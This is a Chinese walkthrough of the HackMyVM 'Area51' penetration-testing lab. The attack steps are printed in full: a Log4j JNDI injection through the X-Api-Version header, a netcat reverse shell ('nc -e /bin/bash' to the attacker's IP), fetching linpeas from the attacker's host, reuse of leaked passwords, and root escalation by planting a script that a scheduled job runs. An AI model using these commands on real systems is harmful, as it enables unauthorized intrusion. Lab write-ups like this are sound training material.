前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >记一次对Hackmyvm-Area51靶机的渗透测试

记一次对Hackmyvm-Area51靶机的渗透测试

作者头像
亿人安全
发布2022-06-30 15:58:41
3580
发布2022-06-30 15:58:41
举报
文章被收录于专栏:红蓝对抗

靶机信息

代码语言:javascript
复制
靶机地址:https://hackmyvm.eu/machines/machine.php?vm=Area51

名称:Area51(51区)

难度:中等

创作者:bit

发布日期:2021-12-24

目标:user.txt和root.txt

搭建靶机

下载完Area51.ova后,使用Oracle VM VirtualBox导入即可

导入时注意!!不要勾上USB控制器,不然会出错

导入完成后,直接启动即可,就可以开始靶机之旅

实验环境

代码语言:javascript
复制
攻击机:VMware      Kali    192.168.2.148
目标机:VirtualBox  Debian  IP自动获取

信息收集

扫描局域网内的靶机IP地址

代码语言:javascript
复制
nmap -sn 192.168.2.0/24

端口扫描,扫描目标机器所开放的服务

代码语言:javascript
复制
nmap -A -p- 192.168.2.108

扫描到22(SSH)、80(HTTP)、8080(HTTP)三个端口,使用火狐浏览器访问80端口,192.168.2.108

好家伙佛波乐(FBI)页面,访问下8080端口,192.168.2.108:8080

发现是一个400报错页面

目录扫描,扫描一些敏感文件之类的,使用gobuster来扫描

代码语言:javascript
复制
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.2.108/ -x php,html,txt

扫描到一个note.txt,访问下192.168.2.108/note.txt

翻译看看

渗透测试

提示存在Log4j漏洞,猜测到很有可能跟8080端口有关,直接访问,使用Burp的插件log4j扫描看看

发现X-Api-Version:参数存在漏洞

存在log4j漏洞,使用poc(https://github.com/kozmer/log4j-shell-poc)拿shell

在kali机器中,log4j-shell-poc目录下必须有jdk1.8.0_20文件夹的java

代码语言:javascript
复制
git clone https://github.com/kozmer/log4j-shell-poc.git
cd log4j-shell-poc
python3 poc.py --userip 192.168.2.148

新开一个终端页面开启监听

代码语言:javascript
复制
nc -nvlp 9001

再新开一个终端页面,输入刚刚的payload

代码语言:javascript
复制
curl 'http://192.168.2.108:8080' -H 'X-Api-Version: ${jndi:ldap://192.168.2.148:1389/a}'

监听这边的终端就收到了

发现是在docker里面,上传一个linpeas.sh搜集下信息

kali机器下载好linpeas.sh,新开一个终端页面开启远程下载服务

代码语言:javascript
复制
python3 -m http.server 7788

监听这边的终端页面执行下载linpeas.sh

代码语言:javascript
复制
wget http://192.168.2.148:7788/linpeas.sh

执行linpeas.sh信息收集

代码语言:javascript
复制
chmod +x linpeas.sh
./linpeas.sh

发现一些目录查看下

代码语言:javascript
复制
cat /var/tmp/.roger,查询到roger的密码
使用ssh远程登录
ssh roger@192.168.2.108

拿到user.txt下的一个FLAG=[xxxxxx]

继续使用linpeas.sh搜集信息

代码语言:javascript
复制
wget http://192.168.2.148:7788/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

发现了roger下有个kang

代码语言:javascript
复制
cat /etc/pam.d/kang,发现是kang的密码
su kang

发现kang的主目录发生了一些奇怪的事情,一个文件不断出现并消失

看起来像是kang用户创建了一个shell脚本,执行所有的.sh文件并删除它们

代码语言:javascript
复制
echo "echo test >/tmp/test" > test.sh
ls /tmp/test -l
echo "nc -e /bin/bash 192.168.2.148 4444" >test.sh

新开一个终端页面开启监听

代码语言:javascript
复制
nc -nvlp 4444
python3 -c 'import pty;pty.spawn("/bin/bash")'
cd root
cat root.txt

成功获取到root权限下的FLAG=[xxxxx]

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-02-06,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 亿人安全 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 靶机信息
  • 搭建靶机
  • 实验环境
  • 信息收集
  • 渗透测试
相关产品与服务
容器服务
腾讯云容器服务(Tencent Kubernetes Engine, TKE)基于原生 kubernetes 提供以容器为核心的、高度可扩展的高性能容器管理服务,覆盖 Serverless、边缘计算、分布式云等多种业务部署场景,业内首创单个集群兼容多种计算节点的容器资源管理模式。同时产品作为云原生 Finops 领先布道者,主导开源项目Crane,全面助力客户实现资源优化、成本控制。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档